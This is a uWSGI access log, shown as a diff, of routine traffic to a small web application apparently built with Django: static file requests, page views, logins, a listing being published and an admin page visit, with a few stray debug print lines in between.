+[pid: 18965|app: -1|req: -1/544] 114.87.230.234 () {40 vars in 934 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/545] 114.87.230.234 () {40 vars in 950 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/546] 114.87.230.234 () {40 vars in 1044 bytes} [Sat Jan 9 00:18:28 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/547] 114.87.230.234 () {40 vars in 1050 bytes} [Sat Jan 9 00:18:28 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/548] 114.87.230.234 () {40 vars in 1012 bytes} [Sat Jan 9 00:18:28 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: 0|req: 392/549] 219.228.146.31 () {38 vars in 917 bytes} [Sat Jan 9 00:19:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/550] 219.228.146.31 () {40 vars in 961 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/551] 219.228.146.31 () {40 vars in 963 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/552] 219.228.146.31 () {40 vars in 983 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/553] 219.228.146.31 () {40 vars in 965 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/554] 219.228.146.31 () {40 vars in 969 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/555] 219.228.146.31 () {40 vars in 944 bytes} [Sat Jan 9 00:19:14 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/556] 219.228.146.31 () {40 vars in 942 bytes} [Sat Jan 9 00:19:14 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/557] 219.228.146.31 () {40 vars in 960 bytes} [Sat Jan 9 00:19:14 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 393/558] 219.228.146.31 () {40 vars in 1006 bytes} [Sat Jan 9 00:19:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/559] 219.228.146.31 () {40 vars in 961 bytes} [Sat Jan 9 00:19:17 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/560] 219.228.146.31 () {40 vars in 969 bytes} [Sat Jan 9 00:19:17 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/561] 219.228.146.31 () {40 vars in 942 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/562] 219.228.146.31 () {40 vars in 960 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/563] 219.228.146.31 () {40 vars in 958 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/564] 219.228.146.31 () {40 vars in 950 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/565] 219.228.146.31 () {40 vars in 944 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 219.228.146.31 client_port: 56506] hr_write(): Connection reset by peer [plugins/http/http.c line 565]
+[pid: 18965|app: 0|req: 394/566] 101.91.60.107 () {32 vars in 626 bytes} [Sat Jan 9 00:20:41 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/567] 101.91.60.107 () {34 vars in 691 bytes} [Sat Jan 9 00:21:01 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 395/568] 61.129.6.251 () {32 vars in 538 bytes} [Sat Jan 9 00:21:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/569] 61.129.6.251 () {34 vars in 625 bytes} [Sat Jan 9 00:21:55 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/570] 101.91.60.107 () {34 vars in 670 bytes} [Sat Jan 9 00:22:12 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 396/571] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 00:22:39 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/572] 101.91.60.107 () {34 vars in 713 bytes} [Sat Jan 9 00:23:03 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/573] 61.129.6.251 () {34 vars in 694 bytes} [Sat Jan 9 00:23:06 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/574] 101.91.60.107 () {34 vars in 685 bytes} [Sat Jan 9 00:23:43 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/575] 61.129.6.251 () {34 vars in 686 bytes} [Sat Jan 9 00:23:56 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/576] 101.91.60.107 () {34 vars in 633 bytes} [Sat Jan 9 00:24:24 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/577] 61.129.6.251 () {34 vars in 727 bytes} [Sat Jan 9 00:24:37 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/578] 61.129.6.251 () {34 vars in 720 bytes} [Sat Jan 9 00:25:17 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 397/579] 180.160.69.32 () {38 vars in 743 bytes} [Sat Jan 9 00:26:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 398/580] 180.160.69.32 () {38 vars in 743 bytes} [Sat Jan 9 00:26:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 399/581] 180.160.69.32 () {48 vars in 938 bytes} [Sat Jan 9 00:26:51 2021] POST / => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 1)
+[pid: 18965|app: 0|req: 400/582] 180.160.69.32 () {40 vars in 835 bytes} [Sat Jan 9 00:26:51 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 401/583] 180.160.69.32 () {40 vars in 837 bytes} [Sat Jan 9 00:26:51 2021] GET /home/ => generated 8154 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 402/584] 115.134.127.94 () {24 vars in 257 bytes} [Sat Jan 9 00:29:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 403/585] 219.228.146.245 () {36 vars in 680 bytes} [Sat Jan 9 00:30:03 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/586] 219.228.146.245 () {38 vars in 729 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/587] 219.228.146.245 () {38 vars in 690 bytes} [Sat Jan 9 00:30:03 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/588] 219.228.146.245 () {38 vars in 707 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/589] 219.228.146.245 () {38 vars in 709 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/590] 219.228.146.245 () {38 vars in 715 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/591] 219.228.146.245 () {38 vars in 711 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/592] 219.228.146.245 () {38 vars in 688 bytes} [Sat Jan 9 00:30:03 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/593] 219.228.146.245 () {38 vars in 702 bytes} [Sat Jan 9 00:30:04 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/594] 219.228.146.245 () {38 vars in 694 bytes} [Sat Jan 9 00:30:04 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/595] 219.228.146.245 () {38 vars in 704 bytes} [Sat Jan 9 00:30:04 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/596] 219.228.146.245 () {38 vars in 766 bytes} [Sat Jan 9 00:30:05 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/597] 219.228.146.245 () {38 vars in 734 bytes} [Sat Jan 9 00:30:05 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 404/598] 219.228.146.245 () {48 vars in 892 bytes} [Sat Jan 9 00:30:43 2021] POST / => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 405/599] 219.228.146.245 () {40 vars in 863 bytes} [Sat Jan 9 00:30:43 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 406/600] 219.228.146.245 () {40 vars in 865 bytes} [Sat Jan 9 00:30:43 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 407/601] 219.228.146.245 () {40 vars in 874 bytes} [Sat Jan 9 00:30:46 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 408/602] 219.228.146.245 () {40 vars in 876 bytes} [Sat Jan 9 00:30:46 2021] GET /publish/ => generated 4909 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 409/603] 219.228.146.245 () {40 vars in 878 bytes} [Sat Jan 9 00:30:50 2021] GET /all-0-0-0 => generated 8838 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/604] 219.228.146.245 () {38 vars in 757 bytes} [Sat Jan 9 00:30:51 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/605] 219.228.146.245 () {38 vars in 755 bytes} [Sat Jan 9 00:30:51 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/606] 219.228.146.245 () {38 vars in 854 bytes} [Sat Jan 9 00:30:51 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 410/607] 219.228.146.245 () {40 vars in 880 bytes} [Sat Jan 9 00:30:53 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 411/608] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:30:53 2021] GET /single/6/ => generated 8796 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/609] 219.228.146.245 () {38 vars in 902 bytes} [Sat Jan 9 00:30:53 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[]
+[pid: 18965|app: 0|req: 412/610] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:31:11 2021] GET /all-1-0-0 => generated 8473 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 413/611] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:31:13 2021] GET /all-0-0-0 => generated 8838 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 414/612] 219.228.146.245 () {40 vars in 880 bytes} [Sat Jan 9 00:31:14 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 415/613] 219.228.146.245 () {40 vars in 874 bytes} [Sat Jan 9 00:31:48 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 416/614] 219.228.146.245 () {40 vars in 876 bytes} [Sat Jan 9 00:31:48 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 417/615] 219.228.146.245 () {48 vars in 954 bytes} [Sat Jan 9 00:31:59 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 418/616] 219.228.146.245 () {40 vars in 871 bytes} [Sat Jan 9 00:31:59 2021] GET /home/ => generated 8157 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 419/617] 219.228.146.245 () {40 vars in 876 bytes} [Sat Jan 9 00:32:02 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/618] 219.228.146.245 () {38 vars in 817 bytes} [Sat Jan 9 00:35:53 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: 0|req: 420/619] 219.228.146.245 () {40 vars in 872 bytes} [Sat Jan 9 00:36:19 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 421/620] 219.228.146.245 () {48 vars in 954 bytes} [Sat Jan 9 00:36:33 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 422/621] 219.228.146.245 () {40 vars in 871 bytes} [Sat Jan 9 00:36:33 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 423/622] 219.228.146.245 () {40 vars in 876 bytes} [Sat Jan 9 00:36:39 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+一辆豪车 粉色 四轮
+[pid: 18965|app: 0|req: 424/623] 219.228.146.245 () {48 vars in 1058 bytes} [Sat Jan 9 00:39:16 2021] POST /publish/ => generated 0 bytes in 25 msecs (HTTP/1.1 302) 7 headers in 202 bytes (4 switches on core 1)
+[pid: 18965|app: 0|req: 425/624] 219.228.146.245 () {42 vars in 910 bytes} [Sat Jan 9 00:39:16 2021] GET /single/7 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 426/625] 219.228.146.245 () {42 vars in 912 bytes} [Sat Jan 9 00:39:16 2021] GET /single/7/ => generated 8331 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/626] 219.228.146.245 () {38 vars in 830 bytes} [Sat Jan 9 00:39:16 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 23084 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 427/627] 219.228.146.245 () {40 vars in 878 bytes} [Sat Jan 9 00:39:24 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 428/628] 219.228.146.245 () {40 vars in 880 bytes} [Sat Jan 9 00:39:27 2021] GET /all-0-0-0 => generated 9214 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 429/629] 219.228.146.245 () {40 vars in 873 bytes} [Sat Jan 9 00:39:29 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 430/630] 219.228.146.245 () {40 vars in 878 bytes} [Sat Jan 9 00:40:37 2021] GET /all-0-0-0 => generated 9214 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 431/631] 219.228.146.245 () {40 vars in 880 bytes} [Sat Jan 9 00:40:43 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 432/632] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:40:43 2021] GET /single/6/ => generated 8796 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/633] 219.228.146.245 () {38 vars in 902 bytes} [Sat Jan 9 00:40:43 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 18965|app: 0|req: 433/634] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:40:49 2021] GET /single/7/ => generated 8331 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[]
+[pid: 18965|app: 0|req: 434/635] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:12 2021] GET /all-1-0-0 => generated 8473 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 435/636] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:14 2021] GET /all-3-0-0 => generated 9214 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 436/637] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:19 2021] GET /all-3-0-1 => generated 9214 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 437/638] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:21 2021] GET /all-3-0-3 => generated 9214 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 438/639] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:22 2021] GET /all-3-0-0 => generated 9214 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 439/640] 219.228.146.245 () {40 vars in 874 bytes} [Sat Jan 9 00:44:45 2021] GET /home/ => generated 8157 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 440/641] 219.228.146.245 () {40 vars in 872 bytes} [Sat Jan 9 00:44:54 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 441/642] 219.228.146.245 () {40 vars in 877 bytes} [Sat Jan 9 00:44:55 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 442/643] 219.228.146.245 () {40 vars in 879 bytes} [Sat Jan 9 00:44:55 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 18965|app: 0|req: 443/644] 219.228.146.245 () {38 vars in 766 bytes} [Sat Jan 9 00:44:55 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 444/645] 219.228.146.245 () {48 vars in 963 bytes} [Sat Jan 9 00:45:02 2021] POST /my-admin/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 445/646] 219.228.146.245 () {40 vars in 884 bytes} [Sat Jan 9 00:45:02 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 446/647] 219.228.146.245 () {40 vars in 886 bytes} [Sat Jan 9 00:45:02 2021] GET /admin-home/ => generated 9586 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/648] 219.228.146.245 () {38 vars in 795 bytes} [Sat Jan 9 00:45:02 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/649] 219.228.146.245 () {38 vars in 820 bytes} [Sat Jan 9 00:45:02 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/650] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:45:02 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/651] 219.228.146.245 () {38 vars in 783 bytes} [Sat Jan 9 00:45:02 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/652] 219.228.146.245 () {38 vars in 766 bytes} [Sat Jan 9 00:45:02 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/653] 219.228.146.245 () {38 vars in 754 bytes} [Sat Jan 9 00:45:02 2021] GET /static/css/style.css => generated 118751 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/654] 219.228.146.245 () {38 vars in 759 bytes} [Sat Jan 9 00:45:02 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/655] 219.228.146.245 () {38 vars in 735 bytes} [Sat Jan 9 00:45:02 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
